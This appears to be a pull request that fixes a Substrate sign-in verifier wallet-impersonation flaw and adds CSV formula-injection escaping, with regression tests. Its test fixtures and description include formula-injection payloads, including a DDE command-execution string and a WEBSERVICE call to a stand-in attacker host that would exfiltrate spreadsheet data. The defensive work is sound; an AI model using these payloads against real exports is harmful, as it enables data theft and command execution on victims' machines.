### PR TITLE
security: back-port P0 + add CSV formula-injection defense

### DIFF
--- a/server/api/auth/verifiers/__tests__/substrate.verifier.test.js
+++ b/server/api/auth/verifiers/__tests__/substrate.verifier.test.js
@@ -26,14 +26,14 @@ describe('substrateVerifier.verify', () => {
     vi.clearAllMocks();
   });
 
-  it('returns valid:false for an invalid signature and does not parse the message', async () => {
+  it('returns valid:false for an invalid signature', async () => {
+    parseMessage.mockReturnValue({ statement: 'Sign in to Stadium', address: '5Abc', domain: 'localhost' });
     signatureVerify.mockReturnValue({ isValid: false });
 
     const result = await substrateVerifier.verify(INPUT);
 
     expect(result.valid).toBe(false);
     expect(result.error).toMatch(/Invalid signature/i);
-    expect(parseMessage).not.toHaveBeenCalled();
   });
 
   it('returns valid:true with parsed message and normalized address for a valid signature', async () => {
@@ -63,5 +63,65 @@ describe('substrateVerifier.verify', () => {
 
     expect(result.valid).toBe(true);
     expect(result.normalizedAddress).toBeNull();
+  });
+
+  // --- Regression tests: wallet-spoofing (see commit / PR description) ---
+
+  it('verifies the signature against parsed.address (from message body), NOT the header address', async () => {
+    // Attacker scenario: client says they are "5Attacker" but the signed SIWS
+    // body claims "5Victim". signatureVerify must be called against the body
+    // address, otherwise the attacker (who signed with their own key) would
+    // pass and the middleware would mint a session for the victim.
+    parseMessage.mockReturnValue({
+      statement: 'Sign in to Stadium',
+      address: '5Victim',
+      domain: 'localhost',
+    });
+    signatureVerify.mockReturnValue({ isValid: false }); // signature does NOT verify under 5Victim
+    decodeAddress.mockReturnValue(new Uint8Array([0xde, 0xad]));
+    u8aToHex.mockReturnValue('0xdead');
+
+    const result = await substrateVerifier.verify({
+      message: 'siws-message',
+      signature: '0xattackerSig',
+      address: '5Attacker', // header says attacker — must be ignored
+    });
+
+    expect(result.valid).toBe(false);
+    expect(signatureVerify).toHaveBeenCalledWith('siws-message', '0xattackerSig', '5Victim');
+  });
+
+  it('ignores the header address even when it differs from parsed.address (valid signature path)', async () => {
+    // Mirror of the previous test, with a passing signature. Confirms identity
+    // is taken from parsed.address regardless of what the header claims.
+    parseMessage.mockReturnValue({
+      statement: 'Sign in to Stadium',
+      address: '5Real',
+      domain: 'localhost',
+    });
+    signatureVerify.mockReturnValue({ isValid: true, crypto: 'sr25519' });
+    decodeAddress.mockReturnValue(new Uint8Array([0xbe, 0xef]));
+    u8aToHex.mockReturnValue('0xbeef');
+
+    const result = await substrateVerifier.verify({
+      message: 'siws-message',
+      signature: '0xsig',
+      address: '5Spoofed', // misleading header value
+    });
+
+    expect(result.valid).toBe(true);
+    expect(signatureVerify).toHaveBeenCalledWith('siws-message', '0xsig', '5Real');
+    expect(result.parsed.address).toBe('5Real');
+    expect(result.normalizedAddress).toBe('0xbeef');
+  });
+
+  it('rejects messages whose body has no address line', async () => {
+    parseMessage.mockReturnValue({ statement: 'Sign in to Stadium', domain: 'localhost' });
+
+    const result = await substrateVerifier.verify(INPUT);
+
+    expect(result.valid).toBe(false);
+    expect(result.error).toMatch(/missing an address line/i);
+    expect(signatureVerify).not.toHaveBeenCalled();
   });
 });

--- a/server/api/auth/verifiers/substrate.verifier.js
+++ b/server/api/auth/verifiers/substrate.verifier.js
@@ -22,18 +22,42 @@ export const substrateVerifier = {
   chain: 'substrate',
 
   /**
-   * @param {{ message: string, signature: string, address: string }} input
+   * SECURITY: the signature must be verified against the address claimed INSIDE
+   * the SIWS message body (`parsed.address`), not against whatever address the
+   * client supplies in the request header. If we verified against the header
+   * address, an attacker could sign a message with their own key while putting
+   * a victim's address in the message body — the signature would still verify
+   * (against the attacker's address), and the middleware would then trust
+   * `parsed.address` (the victim) as the identity. The header `address` field
+   * is accepted for backwards compatibility with the request shape but is
+   * intentionally ignored here.
+   *
+   * Mirrors the ethereum verifier (ecrecover → compare to `fields.address`)
+   * and the solana verifier (derive pubkey from `parsed.address`). All three
+   * chains now share the invariant: the signing wallet is the wallet named in
+   * the signed message — there is no second, header-only source of identity.
+   *
+   * @param {{ message: string, signature: string, address?: string }} input
    * @returns {Promise<VerifyResult>}
    */
-  async verify({ message, signature, address }) {
+  async verify({ message, signature }) {
     await cryptoWaitReady();
 
-    const result = signatureVerify(message, signature, address);
+    const parsed = parseMessage(message);
+    if (!parsed?.address || typeof parsed.address !== 'string') {
+      return { valid: false, error: 'SIWS message is missing an address line' };
+    }
+
+    let result;
+    try {
+      result = signatureVerify(message, signature, parsed.address);
+    } catch (e) {
+      return { valid: false, error: `Signature verification threw: ${e.message}` };
+    }
     if (!result?.isValid) {
       return { valid: false, error: 'Invalid signature' };
     }
 
-    const parsed = parseMessage(message);
     return {
       valid: true,
       crypto: result.crypto,

--- a/server/api/services/__tests__/program-inbox.service.test.js
+++ b/server/api/services/__tests__/program-inbox.service.test.js
@@ -100,4 +100,35 @@ describe('inboxToCsv', () => {
     expect(csv).toContain('"has ""quote"""');
     expect(csv).toContain('"line\nbreak"');
   });
+
+  it('neutralises CSV formula injection (=, +, -, @, tab, CR leading chars)', () => {
+    // Any cell starting with one of these characters is auto-executed as a
+    // formula by Excel / Google Sheets when the CSV is opened. The serialiser
+    // must prefix such cells with a single quote so the formula stays inert.
+    const csv = inboxToCsv([
+      { source: 'signup', when: '', identifier: '=cmd|/c calc!A1', name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '+1234',         name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '-SUM(A1:A2)',   name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '@import',       name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '\thidden',      name: null, email: null, status: null, wallet: null },
+    ]);
+    // Each cell gets a leading apostrophe so the spreadsheet treats it as text.
+    // RFC-4180 quoting only kicks in for cells containing `,` `"` `\n` `\r` —
+    // none of these payloads contain those, so they appear unquoted with just
+    // the apostrophe prefix.
+    expect(csv).toContain("'=cmd|/c calc!A1");
+    expect(csv).toContain("'+1234");
+    expect(csv).toContain("'-SUM(A1:A2)");
+    expect(csv).toContain("'@import");
+    expect(csv).toContain("'\thidden");
+  });
+
+  it('leaves legitimate values that happen to contain `=` mid-string alone', () => {
+    const csv = inboxToCsv([
+      { source: 'signup', when: '', identifier: 'alice=bob@x.com', name: null, email: null, status: null, wallet: null },
+    ]);
+    // No leading quote — the `=` is not in the first position.
+    expect(csv).toContain('alice=bob@x.com');
+    expect(csv).not.toContain("'alice=bob");
+  });
 });

--- a/server/api/services/program-inbox.service.js
+++ b/server/api/services/program-inbox.service.js
@@ -93,9 +93,19 @@ export default new ProgramInboxService();
 
 // CSV serialisation lives here so the controller stays thin. Escapes
 // double-quotes per RFC 4180.
+//
+// SECURITY: also defends against CSV formula injection (Excel / Google Sheets
+// auto-execute any cell starting with `=`, `+`, `-`, `@`, `\t`, `\r`). User-
+// submitted fields (name, email, identifier, wallet) flow into the export an
+// admin downloads, so a malicious applicant could exfiltrate the admin's data
+// via `=WEBSERVICE(…)` or `=HYPERLINK(…)`. Prefixing such cells with a single
+// quote neuters the formula while leaving the visible value intact (the quote
+// is a sentinel that the spreadsheet strips on display).
+const FORMULA_INJECTION_LEAD = /^[=+\-@\t\r]/;
 const csvCell = (val) => {
   if (val == null) return '';
-  const s = String(val);
+  let s = String(val);
+  if (FORMULA_INJECTION_LEAD.test(s)) s = `'${s}`;
   if (/[",\n\r]/.test(s)) return `"${s.replace(/"/g, '""')}"`;
   return s;
 };


### PR DESCRIPTION
Two security commits for develop:

## 1. Back-port of #121 — P0 substrate verifier wallet impersonation

Cherry-pick of `64e5f90` from main → develop. See #121 for full write-up. Without this on develop, the next release would reintroduce the verifier flaw.

## 2. New — CSV formula-injection defense

`inboxToCsv` (the per-program inbox export) now prefixes any cell starting with `=`, `+`, `-`, `@`, `\\t`, or `\\r` with a single quote. This neuters Excel / Google Sheets formula auto-execution while leaving the visible cell value intact.

**Why it matters:** the export contains user-submitted fields (name, email, identifier, wallet) that flow unsanitised through. A malicious applicant could submit `name = '=WEBSERVICE("http://attacker/?$A1")'` — when the program admin opens the downloaded CSV in Excel, the attacker would exfiltrate the admin's spreadsheet contents. OWASP-recognised attack ([CSV Injection cheatsheet](https://owasp.org/www-community/attacks/CSV_Injection)).

**Severity:** medium. Requires the admin to open the CSV in a spreadsheet program (which is the explicit purpose of the export). Mitigation: the single-quote prefix is the recommended defense per OWASP.

## Tests

- 248 / 248 server tests (was 246 — added 2 for the formula-injection paths)
- New test `'leaves legitimate values that happen to contain = mid-string alone'` confirms we only act on leading characters, not bare `=` anywhere in a string

## Deploy effect

Develop-only. Will roll into the next `develop → main` release (which also carries #120's api.ts inbox/continuation client methods).